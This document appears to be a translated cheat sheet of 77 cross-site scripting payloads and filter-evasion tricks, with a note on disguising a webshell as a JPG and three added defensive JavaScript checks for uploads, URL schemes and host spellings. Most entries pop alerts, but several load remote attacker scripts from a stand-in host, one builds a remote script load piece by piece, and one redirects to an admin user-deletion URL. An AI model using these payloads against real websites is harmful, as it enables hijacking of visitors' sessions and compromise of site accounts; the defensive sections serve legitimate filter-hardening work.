Cross-site image shell

XSS cross-site code: <script>alert("")</script>

Add the code to the first line of the trojan (webshell), change the trojan to JPG image format; when the image-format trojan is accessed, our trojan is also executed.
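The note above describes a script file whose first line is markup, renamed to .jpg so that the server accepts it and later executes it. As an added defensive example (not code from the original page), this Node.js check refuses an upload whose bytes do not carry the signature of the image type it claims, and also flags a genuine image header that is followed by markup. The function names and the sample buffers are constructed for this example.

```javascript
// Added defensive example, not code from the original page. Refuse uploads
// whose bytes do not match the image type they claim, and flag a genuine
// image header followed by markup. Names and sample buffers are constructed.

// Leading bytes (magic numbers) of the image formats we accept.
const IMAGE_SIGNATURES = {
  jpg:  [0xff, 0xd8, 0xff],
  jpeg: [0xff, 0xd8, 0xff],
  png:  [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a],
  gif:  [0x47, 0x49, 0x46, 0x38],
};

// Server-side or client-side markup openers that never belong in an image header.
const MARKUP_TOKENS = ['<script', '<?php', '<%', '<html'];

function hasSignature(buf, sig) {
  return buf.length >= sig.length && sig.every((b, i) => buf[i] === b);
}

// Returns { ok, reason } for an uploaded body and the extension it was submitted with.
function inspectUpload(buf, declaredExt) {
  const ext = declaredExt.toLowerCase().replace(/^\./, '');
  const sig = IMAGE_SIGNATURES[ext];
  if (!sig) return { ok: false, reason: `extension .${ext} is not an accepted image type` };
  if (!hasSignature(buf, sig)) {
    return { ok: false, reason: `content does not start with the ${ext} signature` };
  }
  // A valid signature is cheap to prepend, so also look for markup in the
  // first KiB, which is where a disguised script would have to sit.
  const head = buf.subarray(0, 1024).toString('latin1').toLowerCase();
  const hit = MARKUP_TOKENS.find(tok => head.includes(tok));
  if (hit) return { ok: false, reason: `markup token ${hit} inside image header` };
  return { ok: true, reason: 'signature matches and no markup in header' };
}

// Constructed samples: a JFIF header, a script saved as .jpg, and a JPEG
// header with markup appended.
const realJpegHead = Buffer.from([0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10, 0x4a, 0x46, 0x49, 0x46, 0x00]);
const scriptAsJpg = Buffer.from('<script>alert("")</script>\n', 'latin1');
const polyglot = Buffer.concat([realJpegHead, Buffer.from('<?php echo 1; ?>', 'latin1')]);
```

A signature check stops the plain rename; it does not stop a file that is both a valid image and valid input for some interpreter. The durable control is to store uploads where the web server never maps them to a script handler, and to serve them with a fixed image Content-Type and X-Content-Type-Options: nosniff.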
(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, no semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. In China null characters have basically no effect, because there is nowhere they can be used.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters in front
<IMG SRC=" javascript:alert('XSS');">
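Entries (3) to (19) spell the same "javascript:" scheme in a dozen ways: mixed case, numeric character references with and without semicolons, embedded tabs, newlines, carriage returns, NUL bytes and leading spaces. As an added defensive example (not code from the original page), the check below first canonicalises an attribute value at least as aggressively as a browser's URL parser does, and only then inspects the scheme, so every variant collapses to the same rejected value. The function names and the SAMPLES list are constructed for this example.

```javascript
// Added defensive example, not code from the original page. Canonicalise a
// URL-bearing attribute value, then allow-list its scheme. Names and the
// SAMPLES list are constructed for this example.

const SAFE_SCHEMES = new Set(['http', 'https', 'mailto']);

// Characters a browser ignores or trims around and inside a URL: C0 controls
// (tab, LF, CR and NUL included), space, DEL, NBSP, the U+2000 block spaces,
// ideographic space and the BOM. Dropping them everywhere is stricter than the
// browser, which is the right direction for a filter.
const IGNORABLE = /[\u0000-\u0020\u007f\u00a0\u2000-\u200a\u3000\ufeff]/g;

// Decode HTML numeric character references with or without the trailing ';'.
// Digits are consumed greedily, which is also what the HTML parser does.
function decodeNumericEntities(s) {
  const cp = n => (n > 0x10ffff ? '\ufffd' : String.fromCodePoint(n));
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)));
}

// Canonical form used only for the decision; never write it back into the page.
function canonicalUrl(raw) {
  return decodeNumericEntities(String(raw)).replace(IGNORABLE, '');
}

// Returns { safe, scheme, canonical }. A value with no scheme is a relative
// URL and is kept; anything else must be in SAFE_SCHEMES.
function checkUrlAttribute(raw) {
  const canonical = canonicalUrl(raw);
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(canonical);
  const scheme = m ? m[1].toLowerCase() : null;
  return { safe: scheme === null || SAFE_SCHEMES.has(scheme), scheme, canonical };
}

// Constructed samples mirroring the numbered entries above.
const SAMPLES = [
  "javascript:alert('XSS')",                                                  // (3)
  "JaVaScRiPt:alert('XSS')",                                                  // (4)
  '&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)',  // (5)
  '&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114' +
    '&#0000105&#0000112&#0000116&#0000058alert(1)',                           // (9)
  '&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert(1)',         // (10)
  "jav\tascript:alert('XSS');",                                               // (11)
  "jav&#x09;ascript:alert('XSS');",                                           // (12)
  "jav\nascript:alert('XSS');",                                               // (13)
  "jav\rascript:alert('XSS');",                                               // (14)
  "java\u0000script:alert('XSS')",                                            // (17)
  " javascript:alert('XSS');",                                                // (19)
  'vbscript:msgbox("XSS")',                                                   // (40)
  'http://example.test/a.png',                                                // benign
  '/images/a.png',                                                            // benign, relative
];

// Number of values in a list that the check rejects.
function countUnsafe(list) {
  return list.filter(v => !checkUrlAttribute(v).safe).length;
}
```

Protocol-relative values such as the //3w.org/XSS/xss.js form in entry (25) have no scheme and pass this check; they need a host allow-list as well. Apply the check to every URL-bearing attribute the list touches (SRC, HREF, BACKGROUND, DYNSRC, LOWSRC, CSS url()), and prefer contextual output encoding so that user data can never form a new URL in the first place.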
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Doubled open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript in Flash you can mix in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>
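Entries (70) to (73) write one host four different ways (decimal, hexadecimal, octal, mixed), entry (68) points at 127.0.0.1, and entry (76) appends a trailing dot. A host allow- or deny-list that compares raw strings matches none of them. As an added defensive example (not code from the original page), the functions below normalise a host the way classic inet_aton() and DNS do before the comparison: 1 to 4 dotted parts, each decimal, octal (leading 0) or hex (0x), with the last part filling the remaining bytes. The function names and sample hosts are constructed for this example; the mixed form is fed in after the tab and newline stripping that the browser would already have done.

```javascript
// Added defensive example, not code from the original page. Canonicalise a
// URL host before allow/deny-list comparison. Names and sample hosts are
// constructed for this example.

// One dotted part: hex (0x..), octal (leading 0), or decimal. NaN if none apply.
function parseIpv4Part(part) {
  let m;
  if ((m = /^0x([0-9a-f]+)$/i.exec(part))) return parseInt(m[1], 16);
  if ((m = /^0([0-7]+)$/.exec(part))) return parseInt(m[1], 8);
  if (/^\d+$/.test(part)) return parseInt(part, 10);
  return NaN;
}

// Dotted-quad form of a numeric IPv4 host written with 1-4 parts, else null.
// As in inet_aton, the last part fills all remaining bytes, so "3232235521"
// and "192.168.1" are both spellings of 192.168.0.1.
function canonicalIpv4(host) {
  const parts = host.split('.');
  if (parts.length > 4) return null;
  const nums = parts.map(parseIpv4Part);
  if (nums.some(Number.isNaN)) return null;
  const lead = nums.slice(0, -1);
  const last = nums[nums.length - 1];
  const lastBytes = 4 - lead.length;
  if (lead.some(n => n > 255) || last >= 2 ** (8 * lastBytes)) return null;
  let value = 0;
  for (const n of lead) value = value * 256 + n;
  value = value * 2 ** (8 * lastBytes) + last;
  return [24, 16, 8, 0].map(sh => Math.floor(value / 2 ** sh) % 256).join('.');
}

// Lower-case, drop the single trailing dot of an absolute DNS name (entry 76),
// and expand numeric hosts to dotted quads.
function canonicalHost(host) {
  const h = host.trim().toLowerCase().replace(/\.$/, '');
  return canonicalIpv4(h) ?? h;
}

// True for loopback, RFC 1918, link-local and 0/8 addresses after canonicalisation.
function isInternalAddress(host) {
  const quad = canonicalIpv4(canonicalHost(host));
  if (quad === null) return false;
  const [a, b] = quad.split('.').map(Number);
  return a === 127 || a === 10 || a === 0 ||
    (a === 172 && b >= 16 && b <= 31) ||
    (a === 192 && b === 168) ||
    (a === 169 && b === 254);
}

// Allow-list check that survives all of the re-spellings above.
function hostAllowed(host, allowList) {
  const canon = canonicalHost(host);
  return !isInternalAddress(canon) && allowList.map(canonicalHost).includes(canon);
}
```

Canonicalising both sides of the comparison is what makes the list hold: the allow-list entry 66.102.7.147 and the submitted host 0x42.0x66.0x7.0x93 are the same address once normalised, and 3232235521 is rejected as 192.168.0.1 before it can be compared.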
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>